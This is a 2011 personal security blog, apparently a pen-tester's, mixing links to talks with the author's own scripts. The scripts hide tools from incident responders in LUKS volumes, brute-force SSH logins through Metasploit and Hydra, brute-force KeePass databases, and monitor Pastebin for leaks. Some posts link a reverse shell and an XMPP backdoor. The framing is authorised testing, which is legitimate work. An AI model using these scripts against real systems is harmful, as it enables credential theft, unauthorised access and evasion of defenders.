Thursday, December 22, 2011

Owning a Windows Domain with Metasploit's Incognito and Persistence Modules

Found via @armitagehacker on Twitter.

This video shows a demo that uses Armitage (Metasploit) to compromise a Windows Domain Controler.

The attacker gains access to an unpatched Windows web server  by exploiting the classic MS08-067. On the web server, the attacker is able to obtain the cached domain credentials of an administrator  and use them to compromise the domain controller.

The attacker also makes use of the persistence module to keep a foothold on the compromised system.


Monday, December 12, 2011

Auditing logs: tracing e-mail transactions

Every good admin knows that analyzing the log files plays a key role in not only security, but also in the day-to-day IT operations. Who does not read the logs... (sarcasm)?

One of the situations I have to face really often is investigate e-mail problems such: delays, e-mail not arriving, bounces, user account does not exist, etc.. or, simply, whether a user sent an e-mail or not.

If reading the logs created by Postfix or Sendmail is a pain 'per se', trying to understand what happened in a scenario with multiple intermediate servers is a nightmare. Therefore, doing log management is key to succeed (in this particular situation or any other that involves large quantities of data).


There is nothing fancy in my setup. I am just using a centralized syslog server to collect all the raw logs created by the e-mail servers. Then, we can trace the problem from one single place, that is good, but trying to understand what happened is still a pain.  We still cannot see the forest for the trees.


I have come up with a Python script ( search_email_transactions.py ) that parses Postfix and Sendmail logs. It searches all the e-mail transactions that match the  message id, the sender, the recipient and the date.

The output is self-explanatory:

# cat /var/log/all |  ./search_email_transactions.py -l -  -f ^me@foo.com  -i 4EDC80B6.8040107@smtp.foo.com

transaction: E324DA41CA
from:   me@foo.com
msgid:  4EDC80B6.8040107@smtp.foo.com
date:   Dec  5 09:28:42
to:     recipent='you@bar.com' , relay='smtp.bar.com[10.10.10.1]:25', status='sent (250 2.0.0 pB58ShMJ024096 Message accepted for delivery)'
host:   smtp1


In this example, it only outputs one unique transaction but in a scenario with multiple servers we should have a listing of all the transactions and all the servers involved, giving us the full picture.

Since it is time and CPU consuming, I am planning to modify this script to treat all the raw logs and dump all this information to a search engine like elasticsearch, making the troubleshooting faster while still having the raw logs in case I need to go deeper.

Tuesday, November 22, 2011

Understanding APT and Counter Espionage

Thanks to Irongeek I have found the following talk at SkyDogCon.

This is a really good talk you have to watch if you want to understand APT beyond any FUD and if you want  learn how to defend your network against it.



Friday, November 11, 2011

Hiding The Toolkit On Linux With LUKS

The idea behind this post is making the Incident  Response a little bit more complicated during a pen-test, by hiding our tools in "hidden volumes".


Ideally,  when the hard drive has unpartitioned space, the attacker can create a new partition and encrypt it with LUKS to hide the tools. By doing so, the main file system remains unchanged (no new files are written/modified that can trigger an alert in the HIDS) and it is difficult to spot unless the defenders keep track of the logs that will point to new file systems being mounted.


The procedure would be pretty easy:
  • Mount the LUKS volume
  • Execute the tool in backround
  • Umount the LUKS volume in 'lazy mode'

Reading umount(8) , we can find the flag -l :
Lazy unmount. Detach the filesystem from the filesystem  hierarchy now, and cleanup all references to the filesystem as soon as it is not busy anymore.  (Requires kernel 2.4.11 or later.)
The following script works under the same principle, but it creates a file instead of a partition. In this case, it creates a 300MB file named "volume"  that will contain a ext3 file system encrypted with AES 256.


#! /bin/sh

function find_device_name {
        losetup -j $1 | awk '{print $1}' | cut -f1 -d ":"
}


function create_raw_vol {
        dd if=/dev/zero of=${1} bs=1M count=$2 &> /dev/null
}


function create_luks_volfile {
        local raw_vol_dev=""
        raw_vol_dev=`losetup -f`
        create_raw_vol $1 $2
        losetup $raw_vol_dev $1
        echo $3 |cryptsetup  -c aes -s 256 luksFormat `find_device_name $1`  &> /dev/null
        losetup -d `find_device_name $1`
}


function mount_luks_volfile {
        local raw_vol_dev=""
        raw_vol_dev=`losetup -f`
        losetup $raw_vol_dev $1
        echo $3 |  cryptsetup luksOpen `find_device_name $1` $2 &> /dev/null
}

function umount_luks_volfile {
        cryptsetup luksClose ${2} &> /dev/null
        losetup -d `find_device_name $1`

}

vol_name="./volume"
vol_size="300"
mapper_name="hidden_volume"
password="1234"


create_luks_volfile $vol_name $vol_size $password
mount_luks_volfile $vol_name $mapper_name $password
mkfs.ext3 /dev/mapper/${mapper_name}
sleep 5
umount_luks_volfile $vol_name $mapper_name

Fetching the SAM and System Files Without Shutting Down Windows

Via securitybydefault [Spanish]


The linked blog post explains how to fetch the SAM and System files from a Windows computer without shutting down the system.


Since both files are locked by other processes, they cannot be read. Therefore, the standard procedure would be shutting down Windows and running a live distribution to obtain a copy.


The article points to a talk given by Tim Tomes and Mark Bagget in Hack3rcon II, where they introduce a script they wrote to extract the files  by creating Shadow Copies.


Monday, October 31, 2011

Extracting the Password Hashes from a Memory Dump

Via this post in thehackernews.com.


This video explains how to use Volatility to extract the NTLM password hashes from a memory dump, by  finding the memory addresses that belong to the \WiNDOWS\system32\config\SAM and  and \WiNDOWS\system32\config\system.




Resources on Vulnerable Web Applications

This post is just a reference to a list of available vulnerable web applications, in case I need to test tools or sharpen my skills :)


This post from Taddong has a good list of projects that maintain vulnerable web applications in several languages: PHP, Java, Ruby, ColdFusion, etc.


The listing is broken into Offline (source code),  VM/ISO  and Live Systems.



Tuesday, October 25, 2011

DroidSheep: Hijacking Sites With Your Android Phone

Found via securitytube .


Droidsheep is an Android application that permits to use your rooted Android phone to easily hijack websites in a wireless network.



Tuesday, October 11, 2011

Friday, October 7, 2011

Chris Gates and Rob Fuller at Derbycon 2011

Really nice presentation that Chris Gates and Rob Fuller gave at Derbycon 2011  (via IronGeek).

In a nutshell,  the talk exposes how a pen-test should be carried instead of  the simple 'scan-exploit-report'.

A proper penetration test must be data driven and it will always be costumer dependent. In fact, one of the most complicated parts of a penetration test is deciding with the costumer the objective and the rules of engagement.

The last part explains several post-exploitation techniques and some available tools that are under development.


Wednesday, October 5, 2011

Adaptive Penetration Testing at Derbycon

Irongeek has started publishing the Videos of Derbycon 2011 and the following one is probably one of my favorites so far.

Kevin Mitnick and Dave Kennedy go through some examples of penetration tests that, mainly, use social engineering attacks.

At the end of the talk Dave Kennedy also presented the new version of The Social-Enginner Toolkit.

Really worth watching!

Friday, September 30, 2011

Windows Shellbags and Post Exploitation

Via securityaegis and seen in Twitter.


Shellbags are a set of registry keys that store the preferences of each folder that has been opened at least one time with Windows Explorer (local,remote, portable devices, etc.).

From a Post Exploitation point of view, this information offers us a good idea of the activities being carried in the exploited desktop computer. Thus, we can figure out how critical the computer and the the information it holds are for our costumer.

The linked post comments that, during a big engagement, we may pop up a shell in a computer that belongs to HR, R&D, etc..  but, at first sight, we could not distinguish how important it is compared to several other similar desktops among the organization.

Below you can find a demo of the meterpreter script in action.




Untitled from Securityaegis on Vimeo.

Thursday, September 22, 2011

Embedding Msfconsole in Python scripts through the XMLRPC interface

During the last days I have been playing with the Metasploit's XMLRPC interface and I have had lots of fun! :)

I have created a set of Python classes that permit to interact with Metasploit in different ways, hiding the complexity of the the XMLRPC calls.


MsfBatch
This class permits to launch non-interactive jobs in Metasploit, which will be ran in backgroud.


MsfConsole
This class permits to embed a full Metasploit console in your Python script. It also offers a bit of automation, because it permits to launch some tasks in background or foreground before we start interacting the console.




Examples
The following code launches an auxiliary module to find which SSH version is running a particular server. This script launches the task and then starts interacting with the created console

#! /usr/bin/env python

import signal
from pymsf import pymsf
import os
import sys


def signal_controlc(signal,frame):
        myconsole.destroy()


myconsole = pymsf.MsfConsole()
myconsole.login("msf","123456")
myconsole.create_console()


opts = {
"RHOSTS": sys.argv[1],
}
print "launching"
signal.signal(signal.SIGINT, signal_controlc)
myconsole.aux("auxiliary/scanner/ssh/ssh_version",opts,True)
myconsole.interact()
myconsole.destroy()

Output
# ./version.py 127.0.0.1
launching

                |                    |      _) |
 __ `__ \   _ \ __|  _` |  __| __ \  |  _ \  | __|
 |   |   |  __/ |   (   |\__ \ |   | | (   | | |
_|  _|  _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|
                              _|


       =[ metasploit v3.7.2-release [core:3.7 api:1.0]
+ -- --=[ 699 exploits - 361 auxiliary - 54 post
+ -- --=[ 224 payloads - 27 encoders - 8 nops
       =[ svn r12982 updated 94 days ago (2011.06.20)

Warning: This copy of the Metasploit Framework was last updated 94 days ago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:
             http://www.metasploit.com/redmine/projects/framework/wiki/Updating

RHOSTS => 127.0.0.1
[*] 127.0.0.1:22, SSH server version: SSH-2.0-OpenSSH_5.4p1 FreeBSD-20100308
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf auxiliary(ssh_version) >



The following code launches batch jobs in our running Metasploit console, trying to login to a SSH server. The script keeps waiting until the job has finished and then lists the existing sessions in case we have created a new one.

#! /usr/bin/env python

from pymsf import pymsf
import os
import sys
from time import sleep


batch = pymsf.MsfBatch()
batch.login("msf","123456")

opts = {
"RHOSTS": sys.argv[1],
"RPORT": "22",
"USERNAME": 'root',
"PASSWORD": sys.argv[2],
"THREADS": "8",
"USER_AS_PASS": 'false',
"BLANK_PASSWORDS": "false"
}

batch.aux("scanner/ssh/ssh_login",opts)
before=batch.numSessions()
batch.waitJobsFinished()
if before < batch.numSessions():
        print "New session created. Listing opened sessions"
        batch.listSessions()

print "Finish"

Output
./login.py 127.0.0.1 toor
New session created. Listing opened sessions
auxiliary/scanner/ssh/ssh_login  :: 127.0.0.1
Finish


The code can be found here

Monday, September 19, 2011

Tracking the Attackers with a Web Honeypot

GlastopfNG is a web Honeypot that simulates vulnerable web applications in order to attract  intruders and understand their attacks.

The following talk is mainly focused in the researcher's point of view, getting statistics and finding new attacks, but I understand that this tool is extremely useful for the defenders because it may help us to spot and study the attackers as well.

Its key features are:

  • Dynamically generate dorks in order to attract the attacker
  • Pattern matching engine.
  • Extensible with modules to detect and react to new attacks.
  • Custom reporting. We can write our own report module that could feed our alerting system.


Slides


Thursday, September 15, 2011

Analyzing Malicious PDF Files with Peepdf [Spanish]

Via securitybydefault


peepdf is a tool written in Python that analyzes the tree structure in the PDF file. This kind of tool is really helpful to have a first impression and decide whether a PDF file could be malicious or not.

The commented post uses  peepdf to find the objects containing the Javascript code that makes the heap spry and the shellcode.

Once shellcode is extracted, they use a standard debugger to conclude that it downloads  a version of the Zeus trojan

Friday, September 9, 2011

Team Tactics In Armitage

Via Securitytube.

I have found this great video that explains how to use Armitage in a team scenario. Great tool!

You can find a complete  training  in a series of 6 videos posted by Raphael Mudge in his profile on Securitytube.





Armitage and Metasploit Training - Team Tactics from Raphael Mudge on Vimeo.

Tuesday, September 6, 2011

Some Post Exploitation Goodness

Via room362.com (Rob Fuller)

Rob Fuller has created three documents in Google Docs with a list of commands that can be used to gather information during the post exploitation phase in Windows, Linux and OSX systems.

I am sure the lists are  going to be really useful for many people with the help of some Metasploit Scripting skills.

Unix Post Exploitation

Windows Post Exploitation

OSX Post Exploitation

Monday, August 29, 2011

Clean a wordlist for use with password cracking tools and rules

Via commandlinefu.com


This post is just a personal note. I am sure I will need this command in the future to clean up my wordlists :)


$ cat dirtyfile.txt | awk '{gsub(/[[:punct:]]/,"")}1' | tr A-Z a-z | sed 's/[0-9]*//g' | sed -e 's/ //g' | strings | tr -cs '[:alpha:]' '\ ' | sed -e 's/ /\n/g' | tr A-Z a-z | sort -u > cleanfile.txt

Monday, August 22, 2011

Password cracking and creating custom wordlists

In this day and age, almost everybody has a good video card that can be used to crack passwords, like Nvidia and the CUDA framework, and it really helps to speed it up.


Yes, I agree that computing power is really helpful, but it cannot beat a good crafted custom wordlist.  Cracking MD5 hashes may be fast, but try doing the same with other hashes :)


My advise is simple. Know your target as good as you can!!  Their culture, their language, their people, what do they do for living, etc... and build a custom dictionary on top of that.


You may also find useful this old post published by the Pauldotcom crew.  The idea behind it is using the target's website  for our dictionary since, in theory,  it is a valuable source of  the vocabulary being used inside the company.



I did some tests following the above commented tips and I used Cryptohaze Multiforcer  (a CUDA based multihash cracker) to crack the passwords. The results were spectacular and I ended up with a 400MB wordlist (aprox 35M words) and it found many of the passwords  in few minutes :)









Thursday, August 18, 2011

Attacking PEAP wireless networks

Great video, as always, posted by Vivek Ramachandran on SecurityTube.


This time, Vivek explains how to attack PEAP networks.  In a short resume, a Honeypot is setup with a roge AP and a Radius server in order to get the challenge and response  (802.1X) sent when a unaware user connects to our system.

Once we have captured the challenge and the response sent to our own Radius server, we can use the tool called asleap, written by Joshua Wright, that will brute-force the password with a dictionary attack.




WLAN Security Megaprimer 33 from Vivek Ramachandran on Vimeo.

Wednesday, August 10, 2011

Trolling the Tor Script Kiddies

Following a tweet made by insit0r about script kiddies abusing Tor to attack web sites and blocking them ,  I thought we should go a bit further and be evil with them.


My first comment was not to block all the Tor exit nodes, since the attacker will use alternative solutions and we will lose visibility.  In my opinion, it is better to flag the connection as it is breaking our policies than just blocking, because the second case will not give us information about the intention and skills of the attackers, but only a connection rejected.


So, it is better to receive a warning that flags a possible illegal activity and correlate/track  the attacker's movements among our infrastructure.


The above comments explain what it comes to be passive monitoring and information gathering, but we could switch to our grey hat and do something a little bit evil with our attackers :)

What about sending some  countermeasures to our attacker, taking advantage of our position,  given that the attacker is not aware he/she has been discovered?

Following this talk in Spanish presented by  Roberto Martinez, I thought we could use Mod Security to inject content on the pages when we detect someone is connecting through Tor. This gives us the following possibilities:


Note: Searching on Google I found this directory that lists all the Tor exit nodes. Now we have all the tools to troll the script kiddies that want to attack our website.


Friday, August 5, 2011

Brute-forcing SSH accounts with THC Hydra and Metasploit

I have written a simple Auxiliary module for Metasploit that permits to brute-force SSH accounts with THC Hydra and load the sessions in  Metasploit.

The approach is as simple as executing Hydra from the shell and recovering the valid credentials with a regular expression. After this, we only have to open a new session with the  SSH libraries available in the framework.

As a side note, this module cannot be used through pivoting like any external program, but the code can be modified to call hydra with a wrapper like tsocks and then scan trough the Socks4a server module .

...
%x[tsocks hydra -f -o #{logfile} -w #{timeout} -t #{threads} -s #{rport} -C #{credentials} #{ip}  ssh2]
...


NOTE: Some of the code is borrowed from the existing SSH auxiliary modules.

Example output:

msf auxiliary(ssh_hydra) > info

       Name: Scanning SSH servers with Hydra
     Module: auxiliary/scanner/ssh/ssh_hydra
    Version: 1
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  ghosthunter

Basic options:
  Name         Current Setting   Required  Description
  ----         ---------------   --------  -----------
  CREDENTIALS  /tmp/credentials  yes       colon separated list of credentials
  RHOSTS       X.X.X.X     yes       The target address range or CIDR identifier
  RPORT        22                yes       The target port
  TASKS        8                 yes       number of connexions in parallel
  TIMEOUT      30                yes       timeout for the responses

Description:
  This module will launch THC hydra to brute-force the ssh credentials
  and then open the sessions with the valid ones.


msf auxiliary(ssh_hydra) > run

[*] X.X.X.X:22, SSH server version: SSH-1.99-OpenSSH_4.4
[*] Attacking X.X.X.X
[*] X.X.X.X:22  /tmp/credentials - Calling Hydra

[*] Valid credentials found: X.X.X.X root root
[*] Command shell session 1 opened (Y.Y.Y.Y:35009 -> X.X.X.X:22) at Fri Aug 05 19:06:00 +0200 2011
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

The module can be found here: ssh_hydra.rb

Thursday, August 4, 2011

[Spanish] Offensive Security talk by Roberto Martinez

The following video corresponds to a talk presented by Roberto Martinez at the Campus Party in Mexico


I highly recommend watching this video since it explains as security in real life should be, instead  of installing devices and ticking a checkbox :)

I would resume the talk as:

  • Information gathering
  • Intelligence
  • Honeypots
  • Feed all your information in a SIEM system to monitor the network activity.
  • Deception and counter attacks: resource exhaustion, dropping exploits
  • Deanonimation and tracking attackers:  decloaking and using our DNS to track the attacker.

In my opinion, I would also add Darknets or sinkholes to gain more extra intelligence :)



[Spanish] Attacking 2G mobile communications

Via rootedcon. They have published more videos of the last Rooted Con 2011

The following video explains how to perform attacks on 2G mobile networks by making use of OpenBSC.




David Pérez y José Picó - Un ataque práctico contra comunicaciones móviles (Rooted CON 2011) from rootedcon on Vimeo.

Wednesday, August 3, 2011

Brute-forcing Keepass password key-chains

From the website:

KeePass is a free open source password manager, which helps you to manage your passwords in a secure way. You can put all your passwords in one database, which is locked with one master key or a key file. So you only have to remember one single master password or select the key file to unlock the whole database. The databases are encrypted using the best and most secure encryption algorithms currently known (AES and Twofish).

This open source password manager is available on Window, Mac, Linux, Android and iPhone. Hence, chances are that we will find one of these keychain files during a pen-test.


Looking for ways to brute-force the password I stumbled across with this python implementation that is able to read the file and dump its contents. It should not be very inefficient since it is using pycrypto, that is implemented in C.


The code is fairly simple and expects the list of passwords  in the standard input.  One possibility is to use John the Ripper for this task :)

You can find the code below.



#! /usr/env/python

#https://github.com/brettviren/python-keepass

# reads a list of passwords from the standard input
# john the ripper may be used to feed the application

from keepass import kpdb
import sys
import fileinput

for line in sys.stdin:
        passwd=line.strip("\n")

        try:
                db = kpdb.Database(sys.argv[1],passwd)
                print "Valid password found for %s : %s" % (sys.argv[1],passwd)
                sys.exit(0)
        except ValueError:
                pass

Tuesday, August 2, 2011

Solftware vendors living in the 90's and the big firewall

This post is yet another my software is behind the firewall rant, you can safely skip it because you wont miss a thing :)

I already twitted about this software vulnerability, but reading the vendor response in the advisory I thought I have to give my two cents.

Basically, their response comes to say that (please note the sarcasm):
Our software is not meant to be in Internet and it should be safe behind the big firewall of your organization. Therefore, we do not care if we have a remote buffer overflow that requires no authentication.


To put it into perspective, the software in question is a licensing server used by many vendors  across the board like: Matlab, Simulink, etc.. and widely deployed in universities and other research institutions, which are their main customers.

So, why do I think their response was not appropriated and, perhaps, idiotic?

  • One of the main characteristics of their costumers is the openness of their networks, because they have students/researchers that tend to go around and need to use the licensing software from all over the network. What does it mean? They have no perimeter and the firewall is useless!
  • Since the license server is inside the network and trusted by the costumer, chances are that the software is running with privileges in a server that is part of the windows domain. What does it mean? The vulnerability can be used by an attacker to gain further access to the domain and perhaps gain domain admin. privileges as a side effect.
  • Their answer is so 90's that they let everybody think that they do not care about security and the lack all the skills.
  • Since they lack on security skills, perhaps they also lack on secure coding practices and there are more security vulnerabilities hidden in their software.

Monday, August 1, 2011

Python XMPP backdoor

Following the previous post, I thought it would be nice to find alternative ways to  code a backdoor  while using Python as the scripting language.

One of my first ideas was to write a simple backdoor that would use some kind of IM (Instant Messaging), like the script kiddies do with IRC. Yes, I can comfortably sit in front of my desk and wait until one of my XMPP bots pops-up in my list of on-line contacts!

I found some easy examples to construct a bot using the python-xmpp library and I reused most of the code.  Pretty script kiddie all together :)

The code can be found here: xmppshell.py

Wednesday, July 13, 2011

Simple Python reverse shell

Some days ago, Rel1k published a post explaining that he decided to include a small Python backdoor in SET.

I gave it a try but I found some problems when executing the script in Linux.

  • The 'quit' command should let the backdoor close the connection and finish its execution, but it was not working.  The string 'quit\n' is received  and the backdoor sends it to the shell instead of quitting.
  • When Control+C is pressed,  the netcat listener finishes the execution and this leaves the backdoor hanging in an infinite loop, consuming lots of resources (while(True){} without any sleep).
I have made a few changes in the script to solve the problems I found and it also connects back again in case we have pressed Control+C by mistake, so we do not lose our shell :)


The modified version can be found here: python_reverse_shell.py



 

Monday, July 11, 2011

Windows Shellbags and Timeline Analysis

I have learned about the Windows Registry and the Shellbags, via this good post written Chad Tilbury on the Sans Computer Forensics blog.

These registry keys store the preferences of each folder that has been opened at least one time with Windows Explorer (local,remote, portable devices, etc.). Thus, the simple existence of these entries and the given timestamps indicates that the intruder accessed the resources, being useful as another source of information to perform our timeline analysis.

The article explains that there are some differences between Windows XP and Windows 7 and the author recommends the tool called Sbag from TZworks.

Friday, July 8, 2011

Windows ASLR and the False Sense of Security

Lately, I have read a lot about exploits bypassing the ASLR protection. In particular, this post from scriptjunkie.us and this one from corelan.be .

I believe ASLR is a really good protection in systems where all the software is making use of it and there is no room for exceptions, but it is not true for Windows. Since this feature is optional on this platform, it only takes somebody to load on your program a DLL that has ASLR disabled to bypass all the protections that were carefully planed.

We have seen these examples with Java, McAfee and Symantec and I am sure we will find many more in the future, since Microsoft will be  trapped  supporting old software for long time if not ever. The only option I see is the Operative System enforcing these protections at low level.

Friday, July 1, 2011

Monitoring Pastebin Leaks

Yesterday I got some time and I wrote a quick script that continuously monitors pastebin.com, looking for interesting keywords.

The script is called pastebin.py and accepts a file containing regular expressions, one per line.


It also permits to reload the regular expressions without stopping it by receiving a SIGHUP and to dump to the screen the  pastes we have  already found with SIGUSR1.


This is a sample output:

./pastebin.py ./file.txt
[!] My PID is: 9475
[!] Loading regular expressions



Dumping stored matches:
[!] Found Match.  http://pastebin.com/raw.php?i=XXXXXXXX :  @aol\.com [33 times] || @yahoo\.com [42 times] || @gmail\.com [729 times] || @hotmail\.com [355 times] || [\w\-][\w\-\.]+@[\w\-][\w\-\.]+[a-zA-Z]{1,4} [5344 times] || @comcast\.net [1 times] || ;
[!] Found Match.  http://pastebin.com/raw.php?i=XXXXXXXX :  @comcast\.net [1 times] || @hotmail\.com [4 times] || @gmail\.com [11 times] || @yahoo\.com [12 times] || [\w\-][\w\-\.]+@[\w\-][\w\-\.]+[a-zA-Z]{1,4} [37 times] || ;
[!] Found Match.  http://pastebin.com/raw.php?i=XXXXXXXX :  [\w\-][\w\-\.]+@[\w\-][\w\-\.]+[a-zA-Z]{1,4} [1 times] || INSERT INTO [1 times] || union.+select.+from [7 times] || ;
[!] Found Match.  http://pastebin.com/raw.php?i=XXXXXXXXX :  @yahoo\.com [2 times] || -- phpMyAdmin SQL Dump [1 times] || @gmail\.com [2 times] || [\w\-][\w\-\.]+@[\w\-][\w\-\.]+[a-zA-Z]{1,4}
 [6 times] || INSERT INTO [1 times] || CREATE TABLE [1 times] || ;
[!] Found Match.  http://pastebin.com/raw.php?i=XXXXXXXXX :  -----BEGIN RSA PRIVATE KEY----- [1 times] || ;
End of dump


Update: a maintained and improved version of this script can be found in Monitoring pastebin.com within your SIEM by Xavier Mertens. It is written in Perl, but I think you can survive the headache :p

Update: It seems that pastebin.com has changed the HTML layout and the regular expressions in the script need to be changed. Since the script is not maintained, you have to make the changes on your own.

Tuesday, June 28, 2011

Analyzing Malicious Websites with Wepawet

Found via this video on securitytube.net:

From the explanation on the  website,

WEPAWET stands for Web Engine to Protect from and Analyze Widespread and Emerging Threats. It is a collection of tools that use static and dynamic techniques to analyze web content to identify possible malicious behavior. It currently supports analyzing Adobe Flash, JavaScript and PDF files.

Therefore, this tool is very useful to quickly analyze compromised websites that are performing drive-by download attacks.

 This service is hosted and maintained by  the University of California, Santa Barbara.

More information on the support page

Monday, June 27, 2011

Loading Raw Images on VirtualBox

This post is just a reference in case I have to load a raw image onto VirtualBox to make an analysis or just run the system.

I found this blog post that explains how to load a raw OS X image onto VirtualBox, but it should be fairly similar with other operative systems.

Web Exploitation Framework - wXf

wXf is a new framework focused on web application security and written in Ruby, with the look and feel of Metasploit.


I have read some posts written by carnalOwnage  as well as some videos on Vimeo and I have to say it  looks really interesting :)

I am quite sure that my definition is too simple, but I understand it follows the same principle of Metasploit but oriented to Web Application security, with the advantage of being well integrated with Burp. Of course, this tool can be really helpful to pen-testers that do an extensive use of Burp, because  it will permit to script many tasks with Buby modules  and automate many attacks, saving lots of time.


Doing some searches on Google I also found this video on securitytube.net that corresponds to a talk offered during the APPSEC DC 2010.



wxf: Web Exploitation Framework with Ken Johnson, Fishnet Security and Chris Gates, No Affiliation. from OWASP DC on Vimeo.


Links carnalOwnage's posts:
http://carnal0wnage.attackresearch.com/2011/05/jruby-buby-wxf-fun.html
http://carnal0wnage.attackresearch.com/2011/05/buby-script-basics-part-1.html
http://carnal0wnage.attackresearch.com/2011/05/buby-script-basics-part-2.html
http://carnal0wnage.attackresearch.com/2011/05/buby-script-basics-part-3.html
http://carnal0wnage.attackresearch.com/2011/05/buby-script-basics-part-4.html
http://carnal0wnage.attackresearch.com/2011/05/buby-script-basics-part-5.html
http://carnal0wnage.attackresearch.com/2011/05/buby-script-basics-part-6.html

Wednesday, June 22, 2011

Didier Stevens' Malicious PDF Analysis Screencasts

Didier Stevens has created a web page with all his screencasts on Malicious PDF analysis.

The above mentioned screencasts teach the viewer in the use of  his PDF tools. In a nutshell:

  • pdfid.py informs about the different kind of objects contained in the PDF document tree: Pages,  Stream,  OpenAction, Javascript. etc.. It permits to quickly flag a suspicious file as malicious, but without looking at its content.
  • pdf-parser.py can be used to extract the contents of a chosen object. This can be used to inspect objects of interest and  particularly: OpenAction and Javascript objects.
  • Its is important to notice that the objects can be compressed and encoded by making use of Filters. This technique can be used to obfuscate the contents of the malicious file and hide them from the view of the antivirus. pdf-parser.py permits to revert these filters by using specific flags in the command line.
  • Another interesting feature is the name type normalization, since the PDF standard permits to encode the characters in the Hex equivalent. This trick would also be useful for antivirus evasion when the engine does not understand the PDF language.

I have also found this old post that Didier wrote in 2008 to explain how a PDF file is structured. If I am not wrong, the example used in the first exercice is a simplified version of the one appearing in the blog post.


Monday, June 20, 2011

Browser Exploitation on Rooted 2011

I have found via SecurityByDefault  the presentation that Raul Siles made on RootedCon 2011 [Spanish] .

Raul explains how to perform Browser Explotation with Beef and XSS, giving a nice example that combines Beef and Metasploit. This demo exploits a XSS  in  a web page and a Java vulnerability in the victim's browser to gain full access to the victim's computer.




Raúl Siles - Browser Exploitation for Fun and Profit Revolutions (Rooted CON 2011) from rootedcon on Vimeo.

Analyzing Malware Hollow Processes with Volatility

Reading this post I have learned what is a Hollow Process and how can it be analyzed with Volatility.

What is a Hollow Process?
Process hollowing is a technique used by some malware in which a legitimate process is loaded on the system solely to act as a container for hostile code. At launch, the legitimate code is deallocated and replaced with malicious code. The advantage is that this helps the process hide amongst normal processes better. If you inspect the process and its imports using conventional tools, they all look legit. The PEB is untouched, but the actual code and data of the process have been changed.

A really simple example would be to create a new Notepad process in suspended mode and then replace the code and data segments with our malicious code before we start the execution. This way, we will not find any trace of malicious activity when doing a quick look at the process list (more info. on the post).



Then, how do we analyze a compromised system? The article explains the following techniques:

  • Looking for RWX memory segments. Some memory segments in a legit process should be 'read-only' and perhaps the attacker forgot to fix these permissions. There are some volatility plugins that do so.
  • Dump the process with the procexedump command  and compare it with the original in the file system (or a well known copy).
  • Since finding the exact binary is difficult, we can also do Fuzzy Hashing.  This technique indicates the amount of common content  in two files. The less similar the binaries are,  the more confident we are that the process was Hollowed. They use the tool called ssdeep (by Jesse Kornblum).

Thursday, June 16, 2011

Spreading Malware Through the Android Market

Nice post [Spanish] written by SecurityByDefault, that explains how simple is the process of spreading malware through the Android Market.

It seems that people perceive the market like a safe place and a controlled software repository, but it is far from that. Once we create an account and we pay 20 Euros (Europe) we can upload applications without any control or restriction. Therefore, the only barrier is the user's criteria (weak!). In fact, some people downloaded the tested applications without advertising them!!!

The test consisted in uploading two applications that were fully functional, but with 'extra' functionality. Both pretended to be an inoffensive Fortune program, but it was more than that:


  • Quote It. It leaks the contact list through GET requests with the excuse of downloading the quotes. The mechanism is simple: Encrypt the data and leak it by using the cookies in the above HTTP requests.
  • Quote Slim. It opens a backdoor on port 8080, that permits to execute commands, access files, etc..

Wednesday, June 15, 2011

Examples of Attack Remediation for Small and Large Enterprises

I have found this post that seems to be the resume of a talk  given by an employee of Mandiant at FIRST 2011.

The text explains the steps that need to be taken to remediate  the attack and the possible scenarios that a small and a large enterprise can face. It is not meant to be a cheat-sheet but  rather the experience in the field and tactics that helped them to be successful.

List of Sandbox Services

This post is just a reference in case I have to use these services in the future.

Via sempersecurus.blogspot.com I have found the list of the most common Sandbox services.

Tuesday, June 14, 2011

Sniffing DECT Phones with Dedected and BT5

Nice article in the BackTrack Wiki that explains how to sniff phone calls made with DECT devices.

The text explains how to  install  and run Dedected  on BT5.  I understand they use Audacity to merge all the WAV files generated by Dedected in one single file, but perhaps there are more tools for this purpose.


UPDATE: I have also  found the following video that explains the whole process


Sniffing DECT phones with BackTrack from smtx on Vimeo.

Analyzing OSX Memory Images with Volafox

I have learned via room362's twitter , volatility and computer.forensikblog.de that there is an open-source tool called Volafox that is able to analyze Mac OSX memory images. This tool is written in python and is built on  top of Volatility.

Kyeong-Sik Lee and the Korean Digital Forensic Research Center have released Volafox, a free and open-source tool to analyze Mac OS X memory images. Volafox is based on work by Matthieu Suiche (paper and slides) and the Volatility memory analysis framework.

Emulating Zeus DNS Traffic to Test the Defenses

Via rapid7 I have found a nice post that uses Metasploit to test how our defenses react when a host is infected with the Zeus trojan.

In a nutshell,  the author uses the module  auxiliary/vsploit/dns/dns_beacon  to resolve a list of DNS  domain names listed in the  Abuse.ch's Zeus Tracker. Since these domain names are known to spread malware, our defenses should react and report the incident.

Please, note the difference between resolving the DNS name and connecting to the server to fetch the malware. I might be wrong, but many IDS/IPS systems only flag the connections to the C&C and the dropper, like the Emerging Threats Signatures.

The IDS/IPS should inspect the DNS traffic in order to flag our tests. The other option is to setup a DNS Sinkhole that redirects these requests, in conjunction with an IDS rule that flags this redirection.

Friday, June 10, 2011

Cracking Password-Protected SSH Keys with John the Ripper

I have just found this announcement sent by Solar Designer from the Openwall Project.


It seems that they have added support to crack password-protected SSH private keys:



This community-enhanced release integrates preliminary support for several non-hashes, implemented under Dhiru Kholia's GSoC 2011 project. Specifically, it supports cracking of OpenSSH's passphrase-protected SSH protocol 2 private keys, password-protected PDF files with 40-bit and 128-bit RC4 encryption, and some password-protected RAR archives.

Yes, Dhiru's SSH key cracker includes OpenMP parallelization. There's a limitation, though: this requires OpenSSL 1.0.0 or newer, for thread-safety of the interfaces being used. When building or running with older versions of OpenSSL, OpenMP parallelization in the SSH cracker is automatically disabled. (You can always use MPI instead.)




Encrypting your Dropbox Data with EncFS

I have found this post via Mubix . This a recurrent subject and I have seen many posts in the past.

Since there is a total lack of security in Dropbox, many people have thought it would be a good idea to encrypt its content, so only the legit owner can access the data. The problem comes when many solutions encrypt complete volumes, forcing us to sync the complete volume to dropbox over and over again, which is not handy at all.

The advantage of EncFS is that it encrypts per file, making it really convenient for our purpose.

Wednesday, June 8, 2011

Metasploit Linux Post Exploitation

 Via digininja's Twitter account, I have found this blog post that describes a set of Metasploit Linux Post Exploitation modules.


